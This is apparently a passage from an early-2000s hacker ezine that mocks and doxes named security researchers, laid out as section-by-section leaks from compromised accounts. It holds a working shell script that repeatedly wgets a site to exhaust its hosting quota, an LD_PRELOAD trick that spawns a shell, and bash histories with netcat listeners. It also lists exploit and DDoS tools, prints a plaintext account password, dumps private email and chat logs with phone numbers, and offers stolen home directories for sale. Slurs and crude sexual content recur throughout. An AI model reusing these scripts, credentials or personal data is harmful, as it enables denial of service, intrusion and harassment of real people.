-rw-r--r-- 1 root j 83 hello.c -rw-r--r-- 1 root j 864 hello.o -rw-r--r-- 1 j j 1489931 includes.tar.gz -rw-r--r-- 1 j j 2285137 jobe.wl -rw-r--r-- 1 j j 24292 kcms_configure -rw------- 1 root j 1028096 ld.core -rw-r--r-- 1 root j 6036 ld.help -rw-r--r-- 1 root wheel 6144813 linux-ar-405.tar.gz -rwxr-xr-x 1 j j 29292 login -rw-r--r-- 1 j j 1607 login.c -rwxr-xr-x 1 root j 10099 loginex -rw-r--r-- 1 j j 7871 loginex.c -rw-r--r-- 1 j j 10344 m00 -rw-r--r-- 1 j j 75867384 ogls -rw------- 1 j j 7918 pcnfsd-priv.tar.gz drwxr-xr-x 2 root wheel 512 pcnfsd_remote -rw-r--r-- 1 root jduck 66 pos.vuln.nets drwxr-xr-x 2 root wheel 1024 qcrack-1.02 -rw-r--r-- 1 j j 1489778 sol7-includes.tar.gz -r--r----- 1 j j 125208178 solaris-2.5.1+wings+ow.tar.gzd -rwxr-xr-x 12 root wheel 512 src -rw-r-xr-x 1 j j 229180 sshd -rw-r--r-- 1 root j 45 stuff -rwxr-xr-x 1 root j 4698 test_ws -rw-r--r-- 1 root j 182 test_ws.c -rw-r--r-- 1 root j 3330 udpsh.tar.gz -rw-r--r-- 1 j j 10344 uf -rw-r--r-- 1 j j 7028 uf.c -rw-r--r-- 1 j j 9684 uf2 -rw-r--r-- 1 j j 9956 w00f -rw-r--r-- 1 root j 2219 w00f.c -rw-r--r-- 1 root j 44802 w00pe -rw-r--r-- 1 root j 48755 w00pe2 -rw-r--r-- 1 j j 2272606 w00t -rwxr-xr-x 1 j j 3568 wuftpfmt.pl -rw-r--r-- 1 j j 9084 z2 -rw-r--r-- 1 root j 6458 z3.c -rw-r--r-- 1 root j 8276 z3.o -rw-r--r-- 1 root j 13793 z3.s w00t are all dtspcd hosts that i scanned out fresh for hacking .pw.uu is my sniff log that i keep hidden and Patriots.Vs.Steelers is really illegal porn Absolutely amazing. # rm -rf / # * >seifried #core02 wonders what chium forgot to p[atch :| patch what? he must've sniffed my passwords you use cleartyext passwords? erk no i might have used a trojanned ssh client somewhere sux to be you how'd he get the root password for su though he/she/it no idea looking now SignOff chiun: #cdc,#core02,#phrack,#teen (Ping Timeout: 400 Seconds) .~e~----------------------------------------------------------~e~. ; *11* phrack staff demystified -- ThE UNiX TeRRoRiZt ; `----------------------------------------------------------------' ThE UNiX TeRRoRiZt brings you "PHRACK STAFF DEMYSTIFIED!": ---------------------------------------------------------- krahmer@cs.uni-potsdam.de <-- SuSe fire this guy! edi@ganymed.org tmogg@zigzag.pl paul@boehm.org crontab@netway.at palmers@segfault.net lorian@hert.org caddis@hackforthedole.au.com <-- ISS fire this guy! gaius@hert.org scut@nb.in-berlin.de hendy@teso.scene.at <-- I use your utmp cloaker! just@segfault.net halvar@gmx.de <-- Know Your Enemy! zip@james.kalifornia.com <-- ISS fire this guy! lists@immutec.com acpizer@unseen.org skyper@segfault.net <-- Hacks from segfault! gamma@segfault.net kil3r@hert.org route@infonexus.com <-- Wrote a stupid book! ThE UNiX TeRRoRiZt brings you "BONUS COVERAGE OF SKYPER HACKING!": ------------------------------------------------------------------ # cat ~skyper/.bash_history ssh www.cnn.com set echo $RESOLV_HOST_CONF ls tar xfvz ADMglibcsh.tar.gz strings resolv/res_hconf.c ./ADMglibcsh ls -al /tmp/.sh rm /tmp/.sh ls exit top su la-. lhendy wow echo "dfusLL#d" >doze.pwd ls -al doze.pwd chmod go-r doze.pwd nc -l -p 1024 whereis nc netcat which nc which netcat netstat -ant nc -l -p 31339 >ircs_coredump_cert.pem unset HISTFILE exit .~e~----------------------------------------------------------~e~. ; *12* gobble blaster -- uncle m4v1s ; `----------------------------------------------------------------' #!/bin/sh # own-gobbles # by uncle m4v1s # # th1z skr1pt takez 4dv4ntag3 0f a kn0wn d0s 0n a gr0up # 0f sekur1ty whiteh@ l4m3rz kn0wn as G0BBLEZ # 3ver s1nce th31r l4m4ss st0rmh0st1ng pr0v1d3r wuz 0wned # & fear1ng 4 th31r l1v3z th@ ADM wuz g01ng 2 k1ll th3m # r0n1n struck up a d34l w/ a fr33 h0st3r. # pr0blem 1z th0 they h4v3 qu0taz. # run th1z, h3lp d0 ur part 2 erad1k8 l4m3rz!!!!!! HTTP_DOMAIN=http://www.bugtraq.org CMD_LYNX=lynx CMD_WGET=wget SITE_RESPONSE=1 DUMP_PATH=/tmp/GOBBLES echo uncle m4v1s gonna buzt s0me headz echo remember 2 add th1z skr1pt 2 ur m0nthly kr0nj0b rm -rf $DUMP_PATH $CMD_LYNX --dump http://www.bugtraq.org | grep exceeded > /dev/null 2>/dev/null SITE_RESPONSE=$? while [ $SITE_RESPONSE -eq 1 ] ; do echo sod0m1zing GOBBLES w/ a retr4kt4bl3 b4t0n ... mkdir $DUMP_PATH cd $DUMP_PATH $CMD_WGET -r http://www.bugtraq.org $CMD_LYNX --dump http://www.bugtraq.org | grep exceeded > /dev/null 2>/dev/null SITE_RESPONSE=$? done rm -rf $DUMP_PATH echo THE MONTH OF THE TURKEY HAS ENDED .~e~----------------------------------------------------------~e~. ; *13* ~e~ 1nterv1ew with te4m OG -- uncle m4v1s ; `----------------------------------------------------------------' 1nterv1ew with te4m OG by uncle m4v1s -------------- m4v1s: y* ben-z: n1gg4 sh1t u kn0w wh4t-1m-sayn, sh1t sh1t... h0ld up lemme hit th4 b0ng 1 m0re tym3 d4wg m4v1s: 0k [appr0xim8ly 15 minutez elapse] [the s0und 0f c0ughing 1n the backgr0und] m4v1s: u 0k br0? ben-z: sh1t, juzt blazn s0me weed u kn0w wh4t-1m-sayn, my b0y dap[gH] iz 0ver u kn0w wh4t-1m-sayn, l3mm3 get an0ther huff be4 th1z fewl10 burnz all my kr0n1k m4v1s: 0k ben-z: ur n0t lyke the m4v1s that teach3z typ1ng r1ght? m4v1s: n0 m0thafuq4 th@z y0ur ugly bl4q m0m... th1z 1nterv1ew 1znt ab0ut me anyh0w h0lm3z m4v1s: u re4dy 2 beg1n d4wg? ben-z: y4 u kn0w wh4t-1m-sayn 1t s33mz l1ke every tyme 1 get 0n 1rc th1z h0 wr4pz her b1g f@ bl4ck l1pz ar0und my c0ck & w0nt l3t g0 u kn0w wh4t-1m-sayn lol ;> m4v1s: 0h, ok ben-z: b3n 2 tha m0th3rfuckin Z BI0t[H m4v1s: y4 w0rd n1gg4-4-re4l ben-z: yiz0 m4v1s: 0k, br0 1 g0t a l0ng l1zt 0f pe0ple 1 n33d 2 retr13v3 sn1ffl0gz fr0m & 1 a1nt g0t n0 sh3llskr1pt 4 1t y3t... s0 if u r try1ng 2 w4st3 my t1m3 1 th1nk 1m g0nn4 g0 ben-z: 0k s0rry m4v1s g0 ah34d m4v1s: k s0... wh0 st4rt3d te4m 0g?? ben-z: s0 u kn0w 1tz like we uz3d 2 be gH, th4 gl0bal h3ll, th3n my b01z m0st8d & m1ndphazr g0t r41d3d.. 1t wuz w31rd y0 cuz lyke me & m0sth8d w0uld alw4yz B t4lkn 0n 1rc n sh1t, u kn0w wh4t-1m-sayn, kuz 1 wuz 0nly 12 @ the t1me, 1 n3v3r h1t n.e. 0f th@ puzzy u kn0w wh4t-1m-sayn, m0st8d, he wuz k1nda l1ke my ment0r 0nl1ne 4 g1rlz.. sh333333333333t we uz3d 2 m4k3 j3nn1c1d3 kum lyke 5 tymez 4n h0ur 0n th4 c0nf.... he uz3d 2 t4lk l1ke he wuz z0rr0 & i wuz h1z truzty s1dek1q R0Dr1g0, u kn0w wh4t-1m-sayn, but th@ wuz 4g3z 4g0 ben-z: anyh0w s0 we g0t th1z 1d34, kuz l1ke h4lf 0f us w3r3nt 3v3n 1n j41l aft3r the gH r41dz, u kn0w wh4t-1m-sayn, cuz lyke we wuznt even 0ld enuff 2 get t1me in juv1e s0 we dec1ded 2 st4rt a sekur1ty kr3w & see 1f we k0uld h1t 1t up b1g... && m4ybe m4k3 s0me pes0z... we f1gur3d 1f we g0t enuf kust0m3rz we k0uld buy hack.c0.za fr0m g0vernmentb01 4fter 1t g0t shut d0wn, & mayb3 3v3n h4v3 enuf $$$$$$ [gr33n] 2 g3t 4 p4tch 4 the AIDZqu1lt w1th m0st8d's n1ck & 4 skreensh0t 0f the wh1teh0use def4c3m3nt. m4v1s: 1nterest1ng... s0 1 he4r u r quite the 4sm k0d3r n0w... ben-z: ya br0... g0tta le4rn th@ sh1t, 1tz t1ght y0.... 3v3r s1nce me & my b01 m0sth8d repl4c3d th3 sh3llk0d3 1n r0tshb.c, 1tz b33n l1ke a gr1pp1ng f4sc1n4t10n 4 m3... u kn0w wh4t-1m-sayn, g0tt4 get the k0d3 4 th4 BQ, y0 n1gg4z b k0ll3ktn s0me l00t, ben-z B p0pn sum r00t, quick'n sl1de up & d0wn /var/l-0-g, be sure 2 rem0ve th3 h0stname 0f any re4l 0g, burn'n s0me k4$h, wgetting ad0re in2 tha /var/cache, s1tt1n 1ns1d3 sm0kn sum cr4q fr0m my c0ke c4n, 0verfl0win y0ur staq gett1n r00t by f00lin sgid m4n, y3h we b4ckd00rd b1tchx, s0 m0thrfuqr WH4TZ n3xt??????/ m4v1s: heh... th4t wuz pr3tty t1ght br0 ben-z: y4 1 g0 4ll sp0nt4ne0uz w/my fre4ky-phr33-phl0... s0meth1n th@ b4nsh33 taught me 4 wh1le baq 0n r00tab3ga... 1 k4nt b st0pd, u kn0w wh4t-1m-sayn, lyke a nucl34r p0wer pl4nt, BEN 2 th4 m0therfuqn Z. m4v1s: 0k d()g k4n u plz ch1ll... ben-z: 0h sh1t itz B3n 2 tha M0THAFUCK1N ZZZZZZZZZZZZ y3z h3r3 1 c0m3, h0pn 0n y0ur sw1tch, hustl1n u 0uta sp0rtzk4rz w1th m0re f1n3ss3 th4n k3v1n p0uls3n u n1gg4z be h8in on my 4g3 but th@z 0k kuz u kn0w 1 fuqd m4ryk4t3 & ashl3y 0ls0n qu1ck 2 th3 dr0p, wh3n u see me j01n y0ur ch4nn3l 0n 1rc u kn0w 1m pakn th4 9 try k0mp1l1ng msk4n & ch3ck1n 4 s0l4r1s b0x3z 1n k0r34 & n0w u kn0w u just kr0ss3d th4 phuckn l1n3 1 w4lk in k0ur4ge0us fuq the p0lym0rph1k sh3llk0d3, 1 d0nt k4r3 1f ur run'n sn0rt 1 g0t 5 b1tch3z h1tn me up 4 breazt 1mpl4ntz be4 1 even get th1nking 4b0ut th3 fukn ch1ld supp0rt m4v1s: w8 up.. i ben-z: BEN 2 THA M0THAFUCKINZ m0thrfuqr u kn0w-wh4t-1m-sayn.. m4v1s: n0 B1TCH U l1sten 2 me, m0re l1ke b3n-2-tha-m0thafukn-G lyke benji, u fukn w4nn4be l1l-b0w-w0w m0thrfuqr fuk u bitch 1ve h4d enuf 0f y0ur sh1t t1m3 2 dump y0ur w4r3z and f1n4lz3 th1z ~el8 styleeeeeeeee ........ ben-z: wtf?????? m4v1s: ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 ***** m4v1s@~el8:/0wned/og# cat trivia.txt Who wrote the first Linux kernel? : Linus Torvalds What register points to the beginning of the stack in x86? : esp Which direction does the stack grow in x86? : down When a processor is said to be 8,16,32,64 bit etc, what bus is that number refering to? : data bus How much memory is allocated for a char on a 32 bit processor? : 4 bytes What does pgp stand for? : Pretty Good Protection What is the highest bit key you can create with pgp? : 4096 bits Who invented hexadecimal? : IBM Hoe many bits in a byte? : 8 The x11 server runs on which port? : 6000 Is it morally and ethically right to eat animals? : NO*no*FUCK MEAT EATERS*nope*naw what is the size of a tcp header in bytes? : 20 what is the size of a ip header in bytes? : 20 what type is NULL defined as? : void pointer what is the site of a integer in bytes? : 4 What header file contains (struct sockaddr_in) : /usr/include/netinet/in.h what is the most common localnet subnet ? : 192.168 list the 2 required layers of network transfers. : Link Layer, IP Protocol what is the \"main\" initilization structure for WinAPI? : WinMain() What does ARP stand for? : Address Resolution Protocol What is the hax0r drink of choice? : pepsi What will gH never do? : die What does Spanning Tree Protocol Prevent? : Network Loops Which Cisco IOS command displays the current software version? : show version What baud rate do Cisco console ports operate at? : 9600 ATM (network protocol) stands for what? : Asynchronous Transfer Mode Traceroute uses ICMP and what protocol? : udp What is the Cisco Caralyst Operating System commonly known as? : CatOS What does ACL stand for? : Access List OC-3\'s use what technology for a medium? : fiber DS-3\'s use what for a medium? : Copper how big is my cock : as big as a broken crayola how big is my dick? : 11 inches around m4v1s@~el8:/0wned/og# lynx sysctl.html Date: Tue Apr 30 20:57:52 CDT 2002 From: ben-z To: YOU! Subject: Neat IP Options in FreeBSD-4.4+ Just thought I'd pass along a few neat freebsd tricks I learned today: sysctl net.inet.udp.blackhole=1 - the boxen will not respond with an RST when it receives a UDP packet on a closed port sysctl.net.inet.udp.blackhole=2 - the boxen does nothing when a UDP packet is received for a closed port or sysctl.net.inet.tcp.blackhole=1 or =2 - same as above, but for TCP The following lines can also be added to /etc/rc.conf for extra security: tcp_drop_synfin="YES" -- the boxen will drop tcp packets with both the SYN+FIN flags set (prevents OS fingerprinting) log_in_vain="YES" -- connections to ports that have no listening socket will be logged tcp_restrict_rst="YES" -- the kernel will no longer respond with an RST for invalid tcp packets icmp_drop_redirect="YES" - the kernel will ignore ICMP_REDIRECT messages Enjoy, ben-z ben@ohgee.org "The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from all computers." m4v1s@~el8:/0wned/og# cat strcpy.txt bash-2.05# cat test.c int main(int argc, char *argv[]) { char buf[100]; strcpy(buf,argv[1]); return 0; } bash-2.05# su - ben su-2.05$ cat strcpy.c char *strcpy(char *dst,char *src) { system("/bin/sh"); return 0; } su-2.05$ gcc -c -static strcpy.c strcpy.c:1: warning: conflicting types for built-in function `strcpy' su-2.05$ ld -shared -o strcpy.so strcpy.o su-2.05$ LD_PRELOAD="/home/ben/strcpy.so" ; export LD_PRELOAD su-2.05$ ./test $ id uid=1000(ben) gid=1000(ben) groups=1000(ben), 0(wheel) m4v1s@~el8:/0wned/og/members/jaynus/code/asm# cat print.s .section .data string_to_print: .ascii "hahahah owned\n" .text .global _start _start: movl $4, %eax movl $1, %ebx movl $string_to_print, %ecx movl $14, %edx int $0x80 movl $1, %eax xorl %ebx, %ebx int $0x80 m4v1s@~el8:/0wned/og/members/jaynus/code# head -n 20 cfg-parse.c |less /* Example high level config parsing */ #include #define SHIT 1 #define POO 2 #define FUCK 3 struct cfg { char *shit; char *poo; char *fuck; }; int main(int argc, char *argv[]) { FILE *fd; struct cfg *in; char buff[255], *cmd; m4v1s@~el8:/0wned/og/files/music# ls ben-z-illumination_beyond.mp3* index.php.save* ben-z-story_to_tell.mp3* shekk-just_another_day-part2.mp3* ben-z_feat_gamble-illusions_freestyle.mp3* shekk-luck_is_your_only_god.mp3* ben-z_feat_gamble-reflections_freestyle.mp3* shekk-top_of_dee_world.mp3* index.html* shekk-wakin_up_bluez.mp3* index.php* m4v1s@~el8:/0wned/og/files/music# cd ../../ m4v1s@~el8:/0wned/og# cat ANNOUNCEMENT-040202.txt OHGEE: After playing around with our new domains, teamog.org and ohgee.org, I thought of a great idea of how to regulate vhosts and email addresses! The problem is this: the domains arent hosted on my box and theres nothing i can do about that. i simply cant give _everyone_ who idles in the channel a bnc and email address. However, i can provide tons of email addresses and a few bncs. SOOOOOO, the way I'm thinking would be most appropriate for dividing up who gets what, is to make this offer: * The first _WORTHWHILE_ package/code/text you submit to be posted on the site, you will recieve an @ohgee.org or an @teamog.org email forward or pop3 account. your choice. * The second (see above) you submit, i will do everything i can to hook you up with ONE bnc to connect to efnet. A few people may have to share an ident due to the background process restrictions, but fuck man its still a r33t bounce =] *** The only other way you can get a teamog.org/ohgee.org subdomain is if you have a LEGIT root boxen that you control the reverse dns for, AND we must ensure that only og members can access that IP. i.e. ipfw must be setup to restrict that IP from every user but you. if you guys absolutely hate this idea let me know, but jaynus and i are the only ones who paid money for this shit, so eat a cock =] sincerely, ben to the motherfucking z, BITCH. ben@teamog.org m4v1s@~el8:/0wned/og# m4v1s@~el8:/0wned/og/ioho/one# ls alfred.pl* cockblaster.irc* fawx3.c* ioho1.jpg* og-brute101.tgz* strscan2b1.c* angst.txt* collegehowto.txt* index.html* kevorkian.txt* quotes.txt* tyrone1.tgz* bacotell.txt* dbsnatch1.tgz* ioho-5-2001.tgz* mrps-v01.c* rvscan-v4.tgz* m4v1s@~el8:/0wned/og/ioho/one# head *.pl *.txt *.irc *.c|less ==> alfred.pl <== #!/usr/bin/perl -w # # example ddos server for non-root shells using perl sockets.. # listening port disuises itself as an eggdrop irc bot. # # crafted by: heeb (heeb@phayze.com) [#og @ irc.ndrsnet.com] # # version 0.1 (2/19/2001): # very slow.. needs a whole lot of work to make it worth using. # includes ident request flood, http GET / flood, smtp HELO flood, ==> angst.txt <== so here i am, 18 years old and lost. 18 years old and prescribed to prozac. 18 years old and 2 times a dropout. is it wrong of me to not want to go to college? is it wrong of me to think maybe theres something more out there for me than 4 more years of fucking school? i never pictured myself working a normal 9 to 5. i mean i love computers technology in general, but i still dont want to be sitting in a fucking cubicle coding my whole life. i always wanted to be something more than that. i just want to be remembered for something. i want to be more than just another rat in the race. but i dont know if i have it in me to be something special. maybe im destined to be ==> bacotell.txt <== [og] hacking "baco tell" for fun and profit. *wink* *wink*, *nudge* *nudge* Step 1: order something that normally comes with tomatoes and has the "red sauce" in it (i.e. a pexican mizza). specifically ask for "no tomatoes". make sure to keep your reciept. Step 2: since the magic red sauce that they use has tomatoes in it, you will get tomatoes. eat almost all of your food, but save a piece of it that has a ==> collegehowto.txt <== how to fail out of college by the ph4rcyd3 you may be thinking to yourself, "sheeeet, how hard could it be to fail out of college?" but believe me, its a lot harder than you think. step 1: have yourself a really laid back senior year. i mean, get into college and everything first. make sure its really far away too. you dont wanna be stuck in your shit town forever. then, get high before classes, skip school, sleep all day. come on! its your god given right as a senior to fuck up. go the to prom with a hot ass chick, get her all drunk and fuck the shit out of her afterwards. then at graduation, dont wear a god damn thing under your gown, and when you get your diploma, give your entire class a fruit bowl. ==> kevorkian.txt <== the kevorkian by halcy0n the kevorkian bong was introduced to me a few weeks ago by a friend of mine named bob. bob, being a pretty big pothead, had all sorts of k-neeto smoking devices in his room. one of which, was a little contraption he called the kevorkian. after 2 good hits off this mofo i was toeeeeeeeee up. so, you want one? well heres how you make em. materials needed ==> quotes.txt <== all i was doing was nukeing I'm not a playa, i just crutch alot I'm an expert on computer physics and how they work and what happens when u do this or that.. I only started nukes yesterday.. I'm a novice.. I can crash your harddirve [BeloZer0(warez@okcnasz-21.ionet.net)] i actually run Win98 and Linux dipship !DuCkTaPe!*! [forfeit(teet@hey.laserlips.your.mother.was.a.snowblower)] JOHNNY FIVE IS ALIVE@#%! i gotz a bad case of carpool tunnel syndrome! isnt it fun to rap freestyle while taking a dump i thought it was some semi leet hax cult. and figured since i was a new member. i would show off my power fuck me gently with a chainsaw and call me mother threasa ==> cockblaster.irc <== # # [og] cockblaster.irc, makes up a whole lot of random insults. # compiled by #og @ irc.ndrsnet.com for good wholesome family fun! # @cb=[^B!^Bcb^B!^B] @one.0=[johnson] @one.1=[cock] @one.2=[dyke] @one.3=[clitoris] ==> fawx3.c <== /* [og] fawx3.c, sends every type of icmp/igmp type+code to * -- heeb (heeb@phayze.com), #og @ irc.ndrsnet.com */ #include #include #include #include #include #include #include ==> mrps-v01.c <== /* * [ Mass RPC Program Scanner v.01 ] * <( IOHO - 2001 )> * * quick, simple rpc scanner. scans a class a/b/c, list, single ip for * running rpc programs. upcoming versions will utilize multiple sockets * for speed, specific rpc id searching, and small os fingerprinting. * look for further versions. * * thanks: robosok for debugging help ==> strscan2b1.c <== /* ( IOHO 2001 #og irc.ndrsnet.com ) */ /* strscan.c v2b1 by ka0z@ndrsnet for IOHO E-Zine http://chickenz.net/og */ /* Basically, I made this for myself and it was suggested that I put */ /* this in the e-zine so I did. Any ideas on how to implement the */ /* multiple line banner checking would be greatly appreciated. */ /* this has been optimized with ntohl and htonl and shit like that blah */ /* blah blah blah.....ok */ #include m4v1s@~el8:/0wned/og/0day# ls 0x3a0x29snmp.c bacotell.txt htwatch-1.1.tgz pr0nhoar.sh trinscan-v1.0b2.tgz 2600-cable_uncap.txt blades.txt idq5.c quotes.txt tyrone1.tgz 73501867.c bsdtelnetd.c kevorkian.txt rvscan-v4.8.tgz x2 7350854.c cockblaster.irc mnemninja/ rvscan-v4.tgz x2.tgz 7350bind9-39273.c collegehowto.txt mrps-v01.c shells-v1.tgz x2src.tar.gz 7350cfsd.tgz dbsnatch1.tgz muhaha.tgz shellsv1.tgz x3.tgz 7350squish.c delegate6x.c netkit-telnetd.c slogin-sexter.c x4.tar 7350telnet.c dtspcx.c og-brute101.tgz solftpd.c x5.tgz 7350wurm.c eggkill.irc og-snmp.c solsafe-0.1.tgz xaim.sh alfred.pl fawx3.c ogfw1.tgz strscan2b1.c xgdb.pl angst.txt fuckm.sh osshchans-1.3.tgz targets asp5.c hhp-netd.tgz pass targets.dat m4v1s@~el8:/0wned/og/0day# ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 ***** END STRAT3G1k 0DAY DUMP .~e~----------------------------------------------------------~e~. ; *14* lyfestylez of the owned and lamest with aempirei -- b_ ; `----------------------------------------------------------------' hello this is b_ as you all know i hate aempirei's g*tz i will show you around his account on gravitino aempirei you are a pussy and i'll kick your fucking ass btw i fucked your fiance $ ssh -l aempirei gravitino.net aempirei@gravitino.net's password: BoW-is-leet $ ls -a ./ IrcLog naim* ../ Mail/ naim.core .BitchX/ SearsMCBill naim.log .addressbook Stereotype.tar.gz newfile .addressbook.lu The Society of Strings.doc ngram-talker.tar.gz .bash_history ainow.doc pics/ .bitchxrc ainow.prn public_html/ .cshrc ambient_idm.mp3 q/ .cyp.fsave bscan.cpp r3sum3.doc .faimrc byz-io.ps readme .history data_me reals.doc .indent.pro e.gz reals.prn .irlrc elite resume.txt .login end-fs.doc scanner.tar.gz .lynx_cookies fofo shit.txt .mailrc irftpdx.c stream_idm .pine-debug1 iwt/ tars/ .pine-debug2 iwt.tar.gz uip-0.6.tar.gz .pine-debug3 kengstrom.doc webcrawl/ .pinerc logo.gz webcrawl.tgz .profile mail/ wuexploit/ .ssh/ mbox wux86_glob.c .tcshrc misccode/ x2-devel/ AIMDump.c moreCA.tar.gz zip-ssh* as you can fucking see we not only kicked your ass, we own your + dumb ass $ head AIMDump.c /* AMBIENT EMPIRE */ #include #include #include #include #include #include #include we have all your 0day qualys warez $ less -R IrcLog [msg(aempirei)] well if you think you are then letz go to the doctor [aempirei(aempirei@gravitino.net)] good idea [aempirei(aempirei@gravitino.net)] thats what i want to do [msg(aempirei)] okie [aempirei(aempirei@gravitino.net)] its just i've had this burning sensation [msg(aempirei)] me too [aempirei(aempirei@gravitino.net)] we should get checked that is all [msg(aempirei)] honey, i agree we have all your private irc convos $ ls iwt 3net fullscan* logo-large report-livescan.c 768scan.c home/ logo-med report-tracemap.c 768scan.conf icons/ makepic* report3d-tracemap.c MD5 ifret.c mkips* scan-main.c Makefile include/ myfont.c sysfuncs.c README ipv4.c osident-main.c tcpscan.c dnslookup* legend.php* osident.c tcpscan.conf draw-topology.c lib/ osprints.conf tracemap.c drawer.php* livescan.c packets.c fasttrig.c livescan.conf php/ look, more qualys-warez $ cat mbox > From: aempirei@gravitino.net [mailto:aempirei@gravitino.net] > From: research@camisade.com [mailto:research@camisade.com] > To: '&' > To: BUGTRAQ@SECURITYFOCUS.COM > To: Olivier Devaux > To: Ralph Logan > To: aempirei@gravitino.net > To: oliv@qualys.com > To: radix@camisade.com > To: rlogan@camisade.com; jw@mksecure.com > To: team-radix@camisade.com Delivered-To: ani-abettini@camisade.com Delivered-To: ani-all@camisade.com Delivered-To: ani-cabad@camisade.com Delivered-To: ani-cts-radix@camisade.com Delivered-To: ani-info@camisade.com Delivered-To: ani-radix@camisade.com Delivered-To: ani-research@camisade.com Delivered-To: ani-rlogan@camisade.com Delivered-To: ani-team-radix@camisade.com Delivered-To: ani@hert.org Delivered-To: eugene@localhost.securityarchitects.com Delivered-To: kendra@blandest.org Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: mailing list pen-test@securityfocus.com From: "Adam O'Donnell" From: "Ambient Empire" From: "Ben Weber" From: "Chad Pringle" From: "Customer Support" From: "DICE" From: "David Litchfield" From: "David Rhodus" From: "Dee and Galen Engstrom" From: "Edg Duveyoung" From: "Home2" From: "InvestBio_Report@aol.com" From: "Jay Doscher" From: "Kathleen Koepp" From: "Kendra Engstrom" From: aempirei@gravitino.net [mailto:aempirei@gravitino.net] From: aempirei@gravitino.net [mailto:aempirei@gravitino.net] From: ani From: ani@hert.org From: anonymous@segfault.net From: awr From: awr From: awr@gravitino.net From: bidconfirm@ebay.com From: obecian From: pandora From: private static void From: proletariat To: messiah To: pen-test@securityfocus.com To: peter@slagheap.net, barclay@mp3.com, mark@stateful.net, To: proletariat To: radix@camisade.com To: rika@smtp.well.com To: rlogan@camisade.com, all@camisade.com To: shok@dataforce.net To: siphon@gravitino.net To: swezlex@yahoo.com To: team-radix@camisade.com To: xbud@g0thead.com To: To: To: To: To: To: To: To: To: To: i luv mail $ cat .ssh/known_hosts redondo.pic.ucla.edu,128.97.12.10 192.168.1.2 64.167.139.59 adsl-64-167-139-59.dsl.snfc21.pacbell.net undef.net,66.126.234.62 $ head wux86_glob.c /*## wux86_glob - x86/linux wuftpd <= 2.6.1 remote root exploit #*//*## written by bind jan 2002 USA #*/ /* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE - DO NOT DISTRIBUTE *//* this is proof of concept software. in no event shall the author be *//* liable for any direct, indirect, incidental, special, exemplary or *//* consequential damages resulting from the use of misuse of this software. */ #include #include im going to kick bind's ass too $ head wuexploit/fuckwu.c /* * fuckwu - wuftpd <= 2.6.1 remote root exploit * written by bind & aempirei * 12-6-2001 * private source code. * do not distribute. */ #include #include msg me for source code $ ls misccode/ aetrojan.c fmt.c haq.c inliner.c p.c tsl_bind.c dnssniff.c fmtg.c identd.c nbtmap.c shit.c $ head naim.log *** Log opened 2002-01-02T10:38.
Ambient Empire -> Catastr0phik | what up
Catastr0phik -> Ambient Empire | purrrrrrrrrrrrrrrrr
Catastr0phik -> Ambient Empire | how exciting!

Catastr0phik -> Ambient Empire | To: Subject: RE: Resume etc. Date: Wed, 5 Dec 2001 17:40:30 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 In-Reply-To: <20011205171320.A29633@gravitino.net> Status: RO X-Status: A Content-Length: 1134 Lines: 45 Hello Christopher, Leona was right and silvio is also coming in the us office before the end of the year. After reading your resume, you fit exactly the profile we are loking for. So tell me when you will be in the bay aera to setup an interview in our office. If you have any question don't hesitate to mail me or to phone me. My phone number is (650) 801-6120 Thanks for your interest in our company. Oliv. > -----Original Message----- > From: aempirei@gravitino.net [mailto:aempirei@gravitino.net] > Sent: Wednesday, December 05, 2001 5:13 PM > To: oliv@qualys.com > Subject: Resume etc. > > > Hello, > > My name is christopher abad. I was told by > Leona, a friend of Silvio's that Qualys will > be opening a San francisco office and to > contact you in possible R&D Job opportunities. > I am currently employed by foundstone inc. > but am returning home to san francisco before > christmas and would be interested in exploring > any possible opportunities in san francisco. > attached is my resume in word format. i appeciate > the time you have taken to review my email. > > best regards, > christopher abad after alot of thinking i have decided to sell aempirei's homedir, and the gravitino box tars at defcon if you get a hold of me, i will be selling aempirei's homedir for $15, and gravitino box (all users) for $30 i'll have them burned to cd's oh and shouts to mrmittens, and vmy/hi for hacking aempirei and to ~el8 for letting me put this in the ezine [CUT_HERE] ch16 .~e~----------------------------------------------------------~e~. ; *15* chapter sixteen -- ktwo ; `----------------------------------------------------------------' y0y0y0y0y0y0, hey ladies and gents, I just thought maybe I would take a risk and include chapter 16 of Hack Proofing Your Network before the book is released. This is the unedited version, fresh off the printing press. Have fun, and remember, I will be autogr- aphing copies of Know Your Enemy for free at this upcoming defcon. Chapter 16: Ryan, suggest places for inclusion of code and screenshots, as requested. Id like to see some screenshots, packet prints, command-line options or something for the fragrouter section. Grammar and style was a bit awkward and punctuation was sparse. I did one pass-through (didn't track the easy edits, so it wouldn't be too hard on the eyes), please highlight anything you feel is still awkward and needs to be clarified by the author. I like the material a lot. Just need to fix wording in a few spots, as mentioned. Chapter 16 IDS Evasion Solutions in this chapter: Understanding How Signature-Based IDSs Work Using Packet Level Evasion Using Protocol and Application Protocol Level Evasion Using Code Morphing Evasion Chapter suggestions for: Examples and Exercises: Check for the specific code called for in each section Screen Shots: Screenshots for each program called for Introduction One of the laws of security is that all signature-based detection mechanisms can be bypassed. This is as true for Intrusion Detection System (IDS) signatures as it is for virus signatures. IDS systems, which have all the problems of a virus scanner, plus the job of modeling network state, must operate at several layers simultaneously, and they can be fooled at each of those layers. IDS?have all the problems of a virus scanner, plus the job of modeling network state. This chapter covers techniques for evading IDSs. These techniques include playing games at the packet level, application level, and morphing the machine code. Each of these types can be used individually, or together, to evade detection by an IDS. In this chapter, we present several examples of how an attack might evade detection. Understanding How Signature-Based IDSs Work An IDS is quite simply the high-tech equivalent of a burglar alarm—a burglar alarm configured to monitor access points, hostile activities and known intruders. These systems typically trigger on events by referencing network activity against an attack signature database. If a match is made, an alert will take place and will be logged for future reference. It is the 